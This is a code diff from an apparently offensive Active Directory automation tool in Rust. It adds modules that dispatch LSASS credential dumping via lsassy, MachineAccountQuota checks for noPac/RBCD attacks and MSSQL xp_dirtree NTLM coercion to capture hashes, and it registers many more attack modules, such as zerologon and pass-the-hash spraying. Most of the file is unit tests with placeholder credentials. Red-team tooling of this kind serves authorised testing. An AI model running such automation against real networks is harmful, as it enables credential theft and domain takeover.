roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned: false, + } + } + + // --- collect_lsassy_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_lsassy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + let work = collect_lsassy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_unowned_host_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_unowned_host("192.168.58.30", "srv01.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_lsassy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_owned_host_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_lsassy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].host_ip, "192.168.58.30"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dedup_key, "lsassy:192.168.58.30"); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_LSASSY_DUMP, "lsassy:192.168.58.30".into()); + let work = collect_lsassy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_falls_back_to_admin_credential() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + // Only admin cred from different domain + quarantine the matching one + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + state.credentials.push(make_admin_credential( + "domadmin", + "Admin!1", + "fabrikam.local", + )); // pragma: allowlist secret + let work = collect_lsassy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "domadmin"); + assert!(work[0].credential.is_admin); + } + + #[test] + fn collect_bare_hostname_matches_any_cred() { + let mut state = StateInner::new("test-op".into()); + state.hosts.push(make_owned_host("192.168.58.30", "ws01")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_lsassy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_owned_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + state + .hosts + .push(make_owned_host("192.168.58.31", "srv02.fabrikam.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_lsassy_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_quarantined_credential_skipped_with_fallback() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "contoso.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_lsassy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "gooduser"); + } + + #[test] + fn collect_skips_empty_password_credentials() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + state + .credentials + .push(make_credential("nopw", "", "contoso.local")); + let work = collect_lsassy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn dedup_key_format() { + let key = format!("lsassy:{}", "192.168.58.22"); + assert_eq!(key, "lsassy:192.168.58.22"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_LSASSY_DUMP, "lsassy_dump"); + } + + #[test] + fn domain_from_hostname() { + let hostname = "dc01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "dc01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: true, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "lsassy_dump", + "target_ip": "192.168.58.22", + "hostname": "srv01.contoso.local", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "lsassy_dump"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["hostname"], "srv01.contoso.local"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = LsassyWork { + dedup_key: "lsassy:192.168.58.22".into(), + host_ip: "192.168.58.22".into(), + hostname: "srv01.contoso.local".into(), + domain: "contoso.local".into(), + credential: cred, + }; + + assert_eq!(work.dedup_key, "lsassy:192.168.58.22"); + assert_eq!(work.host_ip, "192.168.58.22"); + assert_eq!(work.hostname, "srv01.contoso.local"); + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.credential.username, "testuser"); + } + + #[test] + fn domain_extraction_from_fabrikam() { + let hostname = "sql01.fabrikam.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "fabrikam.local"); + } + + #[test] + fn dedup_key_with_various_ips() { + let ips = ["192.168.58.10", "192.168.58.240", "192.168.58.1"]; + for ip in &ips { + let key = format!("lsassy:{ip}"); + assert!(key.starts_with("lsassy:")); + assert!(key.ends_with(ip)); + } + } + + #[test] + fn credential_preference_admin_flag() { + let admin_cred = ares_core::models::Credential { + id: "c1".into(), + username: "domainadmin".into(), + password: "AdminPass!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: true, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let regular_cred = ares_core::models::Credential { + id: "c2".into(), + username: "user1".into(), + password: "UserPass!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let creds = [regular_cred, admin_cred]; + // Fallback logic: find admin credential + let admin = creds.iter().find(|c| c.is_admin && !c.password.is_empty()); + assert!(admin.is_some()); + assert_eq!(admin.unwrap().username, "domainadmin"); + } +} diff --git a/ares-cli/src/orchestrator/automation/machine_account_quota.rs b/ares-cli/src/orchestrator/automation/machine_account_quota.rs new file mode 100644 index 00000000..7c4b5a2e --- /dev/null +++ b/ares-cli/src/orchestrator/automation/machine_account_quota.rs @@ -0,0 +1,342 @@ +//! auto_machine_account_quota -- check MachineAccountQuota (MAQ) per domain. +//! +//! The default MAQ of 10 allows any authenticated user to create computer +//! accounts. This is a prerequisite for noPac (CVE-2021-42287) and RBCD +//! attacks. If MAQ > 0, downstream modules can proceed with machine account +//! creation-based attacks. +//! +//! Dispatches a recon check per domain to query the ms-DS-MachineAccountQuota +//! attribute from the domain root. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect MAQ work items from state (pure logic, no async). +fn collect_maq_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("maq:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_MACHINE_ACCOUNT_QUOTA, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + + items.push(MaqWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Checks MAQ setting per domain via LDAP query. +/// Interval: 45s. +pub async fn auto_machine_account_quota( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("machine_account_quota") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_maq_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "machine_account_quota_check", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("machine_account_quota"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "MachineAccountQuota check dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_MACHINE_ACCOUNT_QUOTA, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup( + &dispatcher.queue, + DEDUP_MACHINE_ACCOUNT_QUOTA, + &item.dedup_key, + ) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "MAQ check deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch MAQ check"); + } + } + } + } +} + +struct MaqWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("maq:{}", "contoso.local"); + assert_eq!(key, "maq:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_MACHINE_ACCOUNT_QUOTA, "machine_account_quota"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "machine_account_quota_check", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "machine_account_quota_check"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = MaqWork { + dedup_key: "maq:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.dedup_key, "maq:contoso.local"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("maq:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "maq:contoso.local"); + } + + // --- collect_maq_work tests --- + + use crate::orchestrator::state::StateInner; + + fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_produces_no_work() { + let state = StateInner::new("test".into()); + let work = collect_maq_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_produces_no_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_maq_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dc_with_matching_cred_produces_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_maq_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "maq:contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_already_processed_dedup() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_MACHINE_ACCOUNT_QUOTA, "maq:contoso.local".into()); + let work = collect_maq_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only fabrikam cred available, should fall back to first + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + let work = collect_maq_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + } + + #[test] + fn collect_multiple_domains_produces_multiple_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state + .credentials + .push(make_cred("fabadmin", "fabrikam.local")); + let work = collect_maq_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + state + .credentials + .push(make_cred("conuser", "contoso.local")); + let work = collect_maq_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "conuser"); + } + + #[test] + fn collect_case_insensitive_domain_match() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_maq_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "maq:contoso.local"); + } + + #[test] + fn dedup_keys_differ_per_domain() { + let key1 = format!("maq:{}", "contoso.local"); + let key2 = format!("maq:{}", "fabrikam.local"); + assert_ne!(key1, key2); + } +} diff --git a/ares-cli/src/orchestrator/automation/mod.rs b/ares-cli/src/orchestrator/automation/mod.rs index bb8cfd3a..5141a35d 100644 --- a/ares-cli/src/orchestrator/automation/mod.rs +++ b/ares-cli/src/orchestrator/automation/mod.rs @@ -13,59 +13,130 @@ //! all threading hacks since tokio tasks are truly concurrent. mod acl; +mod acl_discovery; mod adcs; mod adcs_exploitation; mod bloodhound; +mod certifried; +mod certipy_auth; mod coercion; mod crack; mod credential_access; mod credential_expansion; mod credential_reuse; +mod cross_forest_enum; +mod dacl_abuse; mod delegation; +mod dfs_coercion; +mod dns_enum; +mod domain_user_enum; +mod foreign_group_enum; mod gmsa; +mod golden_cert; mod golden_ticket; mod gpo; +mod gpp_sysvol; +mod group_enumeration; +mod krbrelayup; mod laps; +mod ldap_signing; +mod localuser_spray; +mod lsassy_dump; +mod machine_account_quota; mod mssql; +mod mssql_coercion; mod mssql_exploitation; +mod nopac; +mod ntlm_relay; +mod ntlmv1_downgrade; +mod password_policy; +mod petitpotam_unauth; +mod print_nightmare; +mod pth_spray; mod rbcd; +mod rdp_lateral; mod refresh; mod s4u; +mod searchconnector_coercion; mod secretsdump; mod shadow_credentials; +mod share_coercion; mod share_enum; mod shares; +mod sid_enumeration; +mod smb_signing; +mod smbclient_enum; +mod spooler_check; mod stall_detection; mod trust; mod unconstrained; +mod webdav_detection; +mod winrm_lateral; +mod zerologon; // Re-export all public task functions at the same paths they had before the split. pub use acl::auto_acl_chain_follow; +pub use acl_discovery::auto_acl_discovery; pub use adcs::auto_adcs_enumeration; pub use adcs_exploitation::auto_adcs_exploitation; +pub(crate) use adcs_exploitation::EXPLOITABLE_ESC_TYPES; pub use bloodhound::auto_bloodhound; +pub use certifried::auto_certifried; +pub use certipy_auth::auto_certipy_auth; pub use coercion::auto_coercion; pub use crack::auto_crack_dispatch; pub use credential_access::auto_credential_access; pub use credential_expansion::auto_credential_expansion; pub use credential_reuse::auto_credential_reuse; +pub use cross_forest_enum::auto_cross_forest_enum; +pub use dacl_abuse::auto_dacl_abuse; pub use delegation::auto_delegation_enumeration; +pub use dfs_coercion::auto_dfs_coercion; +pub use dns_enum::auto_dns_enum; +pub use domain_user_enum::auto_domain_user_enum; +pub use foreign_group_enum::auto_foreign_group_enum; pub use gmsa::auto_gmsa_extraction; +pub use golden_cert::auto_golden_cert; pub use golden_ticket::auto_golden_ticket; pub use gpo::auto_gpo_abuse; +pub use gpp_sysvol::auto_gpp_sysvol; +pub use group_enumeration::auto_group_enumeration; +pub use krbrelayup::auto_krbrelayup; pub use laps::auto_laps_extraction; +pub use ldap_signing::auto_ldap_signing; +pub use localuser_spray::auto_localuser_spray; +pub use lsassy_dump::auto_lsassy_dump; +pub use machine_account_quota::auto_machine_account_quota; pub use mssql::auto_mssql_detection; +pub use mssql_coercion::auto_mssql_coercion; pub use mssql_exploitation::auto_mssql_exploitation; +pub use nopac::auto_nopac; +pub use ntlm_relay::auto_ntlm_relay; +pub use ntlmv1_downgrade::auto_ntlmv1_downgrade; +pub use password_policy::auto_password_policy; +pub use petitpotam_unauth::auto_petitpotam_unauth; +pub use print_nightmare::auto_print_nightmare; +pub use pth_spray::auto_pth_spray; pub use rbcd::auto_rbcd_exploitation; +pub use rdp_lateral::auto_rdp_lateral; pub use refresh::state_refresh; pub use s4u::auto_s4u_exploitation; +pub use searchconnector_coercion::auto_searchconnector_coercion; pub use secretsdump::auto_local_admin_secretsdump; pub use shadow_credentials::auto_shadow_credentials; +pub use share_coercion::auto_share_coercion; pub use share_enum::auto_share_enumeration; pub use shares::auto_share_spider; +pub use sid_enumeration::auto_sid_enumeration; +pub use smb_signing::auto_smb_signing_detection; +pub use smbclient_enum::auto_smbclient_enum; +pub use spooler_check::auto_spooler_check; pub use stall_detection::auto_stall_detection; pub use trust::auto_trust_follow; pub use unconstrained::auto_unconstrained_exploitation; +pub use webdav_detection::auto_webdav_detection; +pub use winrm_lateral::auto_winrm_lateral; +pub use zerologon::auto_zerologon; pub(crate) fn crack_dedup_key(hash: &ares_core::models::Hash) -> String { let prefix = &hash.hash_value[..32.min(hash.hash_value.len())]; diff --git a/ares-cli/src/orchestrator/automation/mssql_coercion.rs b/ares-cli/src/orchestrator/automation/mssql_coercion.rs new file mode 100644 index 00000000..a9e9fbfa --- /dev/null +++ b/ares-cli/src/orchestrator/automation/mssql_coercion.rs @@ -0,0 +1,698 @@ +//! auto_mssql_coercion -- coerce NTLM authentication from MSSQL servers via +//! xp_dirtree/xp_fileexist. +//! +//! When we have MSSQL access (discovered by `auto_mssql_detection`) and a +//! listener IP, we can force the SQL Server service account to authenticate +//! back to our listener, capturing its NTLMv2 hash for cracking or relay. +//! +//! This is distinct from the general `auto_coercion` module which uses +//! PetitPotam/PrinterBug against DCs. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Monitors for MSSQL servers and dispatches xp_dirtree NTLM coercion. +/// Interval: 45s. +pub async fn auto_mssql_coercion(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("mssql_coercion") { + continue; + } + + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => continue, + }; + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_mssql_coercion_work(&state, &listener) + }; + + for item in work { + let payload = json!({ + "technique": "mssql_ntlm_coercion", + "target_ip": item.target_ip, + "listener_ip": item.listener, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("mssql_coercion"); + match dispatcher + .throttled_submit("coercion", "coercion", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + target = %item.target_ip, + "MSSQL xp_dirtree NTLM coercion dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_MSSQL_COERCION, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_MSSQL_COERCION, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(target = %item.target_ip, "MSSQL coercion task deferred"); + } + Err(e) => { + warn!(err = %e, target = %item.target_ip, "Failed to dispatch MSSQL coercion"); + } + } + } + } +} + +/// Collect MSSQL coercion work items from the current state. +/// +/// Extracted from the async loop so it can be unit-tested without a +/// `Dispatcher` or real async runtime scaffolding. +fn collect_mssql_coercion_work( + state: &crate::orchestrator::state::StateInner, + listener: &str, +) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for vuln in state.discovered_vulnerabilities.values() { + if vuln.vuln_type.to_lowercase() != "mssql_access" { + continue; + } + + let target_ip = vuln + .details + .get("target_ip") + .and_then(|v| v.as_str()) + .unwrap_or(&vuln.target); + + if target_ip.is_empty() { + continue; + } + + let dedup_key = format!("mssql_coerce:{target_ip}"); + if state.is_processed(DEDUP_MSSQL_COERCION, &dedup_key) { + continue; + } + + let domain = vuln + .details + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + + let cred = state + .credentials + .iter() + .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain.to_lowercase()) + .or_else(|| state.credentials.first()) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(MssqlCoercionWork { + dedup_key, + target_ip: target_ip.to_string(), + listener: listener.to_string(), + credential: cred, + }); + } + + items +} + +struct MssqlCoercionWork { + dedup_key: String, + target_ip: String, + listener: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("mssql_coerce:{}", "192.168.58.22"); + assert_eq!(key, "mssql_coerce:192.168.58.22"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_MSSQL_COERCION, "mssql_coercion"); + } + + #[test] + fn mssql_access_vuln_type_matching() { + assert_eq!("mssql_access".to_lowercase(), "mssql_access"); + assert_ne!("smb_signing_disabled".to_lowercase(), "mssql_access"); + } + + #[test] + fn target_ip_from_vuln_details() { + let details = serde_json::json!({"target_ip": "192.168.58.22"}); + let target = details + .get("target_ip") + .and_then(|v| v.as_str()) + .unwrap_or("fallback"); + assert_eq!(target, "192.168.58.22"); + } + + #[test] + fn target_ip_fallback_to_vuln_target() { + let details = serde_json::json!({}); + let fallback = "192.168.58.10"; + let target = details + .get("target_ip") + .and_then(|v| v.as_str()) + .unwrap_or(fallback); + assert_eq!(target, "192.168.58.10"); + } + + #[test] + fn credential_domain_matching() { + let domain = "contoso.local".to_string(); + let cred_domain = "CONTOSO.LOCAL"; + let matches = !domain.is_empty() && cred_domain.to_lowercase() == domain.to_lowercase(); + assert!(matches); + } + + #[test] + fn credential_domain_empty_no_match() { + let domain = "".to_string(); + let cred_domain = "contoso.local"; + let matches = !domain.is_empty() && cred_domain.to_lowercase() == domain.to_lowercase(); + assert!(!matches); + } + + #[test] + fn mssql_coercion_payload_structure() { + let payload = serde_json::json!({ + "technique": "mssql_ntlm_coercion", + "target_ip": "192.168.58.22", + "listener_ip": "192.168.58.100", + "credential": { + "username": "sa", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + }); + assert_eq!(payload["technique"], "mssql_ntlm_coercion"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["listener_ip"], "192.168.58.100"); + assert_eq!(payload["credential"]["username"], "sa"); + } + + #[test] + fn domain_extraction_from_vuln() { + let details = serde_json::json!({"domain": "contoso.local"}); + let domain = details + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + assert_eq!(domain, "contoso.local"); + + let details2 = serde_json::json!({}); + let domain2 = details2 + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + assert_eq!(domain2, ""); + } + + #[test] + fn mssql_coercion_work_fields() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "sa".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = MssqlCoercionWork { + dedup_key: "mssql_coerce:192.168.58.22".into(), + target_ip: "192.168.58.22".into(), + listener: "192.168.58.100".into(), + credential: cred, + }; + assert_eq!(work.target_ip, "192.168.58.22"); + assert_eq!(work.listener, "192.168.58.100"); + } + + // --- collect_mssql_coercion_work integration tests --- + + use crate::orchestrator::state::SharedState; + + fn make_cred(user: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{user}"), + username: user.into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_vuln( + id: &str, + vuln_type: &str, + target: &str, + details: serde_json::Value, + ) -> ares_core::models::VulnerabilityInfo { + let details_map: std::collections::HashMap = + serde_json::from_value(details).unwrap_or_default(); + ares_core::models::VulnerabilityInfo { + vuln_id: id.into(), + vuln_type: vuln_type.into(), + target: target.into(), + discovered_by: "test".into(), + discovered_at: chrono::Utc::now(), + details: details_map, + recommended_agent: String::new(), + priority: 5, + } + } + + #[tokio::test] + async fn collect_empty_state_returns_nothing() { + let shared = SharedState::new("test".into()); + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_no_vulns_with_creds_returns_nothing() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_mssql_access_vuln_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.22"); + assert_eq!(work[0].listener, "192.168.58.100"); + assert_eq!(work[0].dedup_key, "mssql_coerce:192.168.58.22"); + assert_eq!(work[0].credential.username, "sa"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[tokio::test] + async fn collect_skips_non_mssql_vulns() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "smb_signing_disabled", + "192.168.58.22", + json!({"target_ip": "192.168.58.22"}), + ), + ); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_dedup_skips_already_processed() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + state.discovered_vulnerabilities.insert( + "v1".into(), + make_vuln( + "v1", + "mssql_access", + "192.168.58.22", + json!({"target_ip": "192.168.58.22", "domain": "contoso.local"}), + ), + ); + state.mark_processed(DEDUP_MSSQL_COERCION, "mssql_coerce:192.168.58.22".into()); + } + let state = shared.read().await; + let work = collect_mssql_coercion_work(&state, "192.168.58.100"); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_target_ip_falls_back_to_vuln_target() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state.credentials.push(make_cred("sa", "contoso.local")); + 